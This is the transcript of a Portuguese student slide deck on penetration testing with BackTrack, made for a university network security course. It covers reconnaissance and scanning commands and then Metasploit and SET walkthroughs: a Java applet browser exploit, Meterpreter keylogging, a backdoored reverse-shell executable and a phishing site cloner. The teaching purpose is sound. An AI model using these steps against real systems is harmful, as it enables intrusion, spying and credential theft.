Your SlideShare is downloading. ×

Back track apresentação

622
views

Published on

Este trabalho foi desenvolvido com a finalidade de abordar técnicas de defesas voltadas à segurança da informação, consistindo de uma atividade da cadeira de Segurança de Redes de Computadores da …

Este trabalho foi desenvolvido com a finalidade de abordar técnicas de defesas voltadas à segurança da informação, consistindo de uma atividade da cadeira de Segurança de Redes de Computadores da Universidade Católica de Pernambuco.


0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total Views
622
On Slideshare
0
From Embeds
0
Number of Embeds
0
Actions
Shares
0
Downloads
37
Comments
0
Likes
0
Embeds 0
No embeds

Report content
Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
No notes for slide

Transcript

  • 1. Kleber Santos
  • 2. Introdução
  • 3. Introdução O que é? • Ferramenta voltada para testes de penetração; • Primeira versão lançada em 2006; • Possui mais de 300 ferramentas para tais testes;
  • 4. Devido ao tamanho do arquivo, o vídeo que consistia neste slide foi removido, porém pode ser acessado através do link: http://www.backtrack-linux.org/
  • 5. Introdução Uso em Certificações • Todas oferecidas pela Offensive Security que mantém o BackTrack.
  • 6. Devido ao tamanho do arquivo, o vídeo que consistia neste slide foi removido, porém pode ser acessado através do link: http://www.backtrackbrasil.com.br/site/vd/
  • 7. Pentest • • • • Metodologia para testes de penetração; Simula ataques; Verifica a segurança de um sistema; Possibilita criação de mecanismos de defesa;
  • 8. Pentest • Procedimentos divididos em cinco etapas: 1. 2. 3. 4. 5. Obtenção de informações do alvo; Varreduras de sistema; Ganho de acesso ao sistema; Mantendo o acesso ao sistema; Retirada de evidencias; • Abordaremos as três primeiras etapas divididas em quatro partes;
  • 9. Pentest • Procedimentos divididos em cinco etapas: 1. 2. 3. 4. 5. Obtenção de informações do alvo; Varreduras de sistema; Ganho de acesso ao sistema; Mantendo o acesso ao sistema; Retirada de evidencias; • Abordaremos as três primeiras etapas divididas em quatro partes;
  • 10. Primeira Parte • • • • Obtenção de Informação; Detecção de Sistemas Ativos; Técnica Para Obter Informações DNS; FINGERPRINT;
  • 11. Obtenção de Informação • Metodologia usada para "reconhecimento do terreno"; • Pode ser de forma:  passiva (recursos na internet);  ativa (engenharia social);
  • 12. Detecção de Sistemas Ativos • Princípios básicos na obtenção de informações; • PING detecta hosts ativos;
  • 13. Detecção de Sistemas Ativos FPING:  Executa ping para diferentes hosts ao mesmo tempo através de um *.txt; HPING3:  Detecta hosts, regras de firewall e realiza varreduras de portas; Genlist:  Verifica uma lista de hosts ativos;
  • 14. Informações DNS • DNS traduz endereços de IP em nomes de domínio; • A ferramenta nslookup permite obter informações sobre DNS;
  • 15. Informações DNS DNSENUM:  Pesquisa de hosts, nomes de servidores, registros MX, IPs, etc. DNSMAP:  Descobre subdomínios relacionados ao domínio-alvo. Acompanha wordlist; DNSRECON:  Permite consultas reversas por faixas de IP, NS, SOA, registros MX, transferências de zonas e enumeração de serviços; FIERCE:  Retorna informações adicionais como HINFO, especificando o processador da máquina e o servidor;
  • 16. FINGERPRINT • Técnica na qual se obtém informações sobre sistema operacional; • O NMAP é utilizado para tal checagem de versões; root@bt~# nmap –O <ip_do_alvo>
  • 17. FINGERPRINT TCP SYN (-sS)  examina portas de maneira rápida e difícil de ser detectado por firewalls ou IDS; TCP Connect (-sT)  executa varredura utilizando o Three-Way Handshake; UDP (-sU)  possibilita varredura do protocolo UDP;
  • 18. FINGERPRINT TCP FIN (-sF, -sX, -sN)  utilizados na tentativa de travessia de firewalls; TCP ACK (-sA)  tática utilizada para detecção de regras de firewall; TCP Windows (-sW)  varreduras por janelas, parecido com o método ACK, porém consegue detectar portas abertas versus filtradas e não filtradas;
  • 19. Segunda Parte • SCANNING de portas • Detecção de Sistemas Ativos; • NETCAT – Canivete Suíço;
  • 20. SCANNING de portas • Port Scan é a técnica usada para descobrir serviços vulneráveis em um sistema; Scanning de portas:  identifica portas ativas; De vulnerabilidades:  identifica fraquezas no sistema; De redes:  identifica os hosts ativos;
  • 21. Detecção de Sistemas Ativos
  • 22. NETCAT – Canivete Suíço • Outra ferramenta possível para varreduras num host; root@root:~# nc -v -z 192.168.32.128 1-4000
  • 23. Terceira Parte • Fase de Enumeração; • HTTPRINT; • AMAP, SMTP e SMTPSCAN;
  • 24. Fase de Enumeração • Nesta fase o invasor tenta obter:     nomes de máquinas; usuários; serviços e versões; compartilhamentos, etc; • A ferramenta Nbtscan nos permite obter nome e endereço MAC de um alvo;
  • 25. Fase de Enumeração • Através do nmap podemos executar varredura procurando por serviços que utilizem o protocolo UDP: root@root~# nmap –T4 –sU –sV <ip_host_alvo>
  • 26. Fase de Enumeração • Obtendo retorno de serviços snmp podemos obter informações SNMP com o Snmpcheck: root@root:/pentest/enumeration/sn mp/snmpcheck# ./snmpcheck-1.8.pl –t <ip_host_alvo>
  • 27. HTTPRINT • Possibilita detectar versões de servidores; • Fornece opção de exporta-las para arquivos *.html, *.csv ou *.xml
  • 28. AMAP, SMTP e SMTPSCAN AMAP  tenta identificar aplicações rodando em portas diferentes da usual. SMTP e SMTPScan  busca usuários válidos do nosso host, destinando um IP alvo;
  • 29. Quarta Parte • Ganho de Acesso; • Abordagem à Força Bruta; • SET e Metasploit;
  • 30. Ganho de Acesso • Utiliza de ferramentas que explorem serviços como FTP e SSH; • Explora vulnerabilidades e senhas; • A técnica de engenharia social é extremamente importante em tal etapa;
  • 31. Força Bruta xHydra ou Hidra-GTK  Ferramenta utilizada para quebra de senhas ONLINE;  Suporta diversos protocolos;  Permite utilização de arquivos auxiliares para listas de usuários e senhas (wordlists);
  • 32. Força Bruta • Dicionários e força bruta são técnicas utilizadas para o password cracking; • Outras ferramentas para o mesmo intuito são:  Medusa;  John The Ripper; Todas elas inclusas no BackTrack 5 R3;
  • 33. Invadindo Sistemas com SET e Metasploit Metasploit  Conta com uma interface gráfica ARMITAGE e também a linha de comando, MSFCONSOLE; SET  Tem como alvo fraquezas e estupidez humanas;
  • 34. Invadindo Sistemas com SET e Metasploit • Através do comando msfconsole acessamos o Metasploit via linha de comando; • Configuraremos nossa máquina BackTrack para receber informações do alvo através de uma vulnerabilidade do Java;
  • 35. Invadindo Sistemas com SET e Metasploit
  • 36. Invadindo Sistemas com SET e Metasploit • root@bt:~# msfconsole • root@bt:~# search java • root@bt:~# use exploit/multi/browser/java_sign ed_applet • root@bt:~# show options
  • 37. Invadindo Sistemas com SET e Metasploit set srvhost <ip_local_host_backTrack> set srvport 80 #seta a porta 80 como acesso set uripath <caminho_para_link_url> set appletname <nome_para_o_arquivo_jar> exploit
  • 38. Invadindo Sistemas com SET e Metasploit • Após acessar a URL gerada o alvo permitirá acesso ao invasor; sessions –i 1 # dá acesso à máquina alvo sysinfo # obtém informações da máquina alvo
  • 39. Invadindo Sistemas com SET e Metasploit help # lista comandos do METERPRETER screenshot # obtém um print da tela da máquina invadida
  • 40. Invadindo Sistemas com SET e Metasploit keyscan_start # starta um sniffer para captura de navegação keyscan_dump # exibe informações capturadas
  • 41. Invadindo Sistemas com SET e Metasploit • Técnica semelhante pode ser explorada através da ferramenta SET gerando-se um payload; • Ao acessar a ferramenta, navega-se em: 1 – Social Engineering Attacks; 4 – Create a Payload na Listener;
  • 42. Invadindo Sistemas com SET e Metasploit • Deve-se informar o IP da máquina que receberá as informações obtidas através do payload (IP da máquina BackTrack); • Feito isso, navega-se em: 2 – Windows Reverse TCP Meterpreter; 16 – Backdoored Executable (BEST);
  • 43. Invadindo Sistemas com SET e Metasploit • Após informar a porta solicitada, ele gerará o arquivo executável: /pentest/exploits/set msf.exe • Confirma-se com yes o start do listener; • O acesso à máquina alvo se dará após a execução do arquivo pela mesma e executando: sessions –i 1.
  • 44. Invadindo Sistemas com SET e Metasploit • Com a mesma ferramenta SET, podemos clonar páginas web para obter informações de uma vítima através das opções: 1 2 3 2 – – – – Social Engineering Attacks; Website Attack Vectors; Credential Harvester Attack Vectors; Site Cloner;
  • 45. Invadindo Sistemas com SET e Metasploit • Informa-se a URL do site a ser clonado; • Acessa-se através do IP da máquina do atacante; Obs.: Podemos atribuir um domínio ao IP para facilitar o acesso pela vítima;
  • 46. Conclusão • Técnicas de invasão estão diretamente atreladas às vulnerabilidades dos sistemas e das pessoas
  • 47. Conclusão • • • • • Configurar devidamente servidores; Atualizar devidamente SOs e SWs; Utilização de senhas fortes; Desconfiar de coisas óbvias; Usufruir de uma política de segurança;
  • 48. Conclusão • Atentar à boas práticas voltadas à segurança nos dá uma garantia quanto ao CID;
  • 49. klebernox.wordpress.com/backtrackabordagem-a-seguranca-em-redes/
  • 50. Obrigado !

×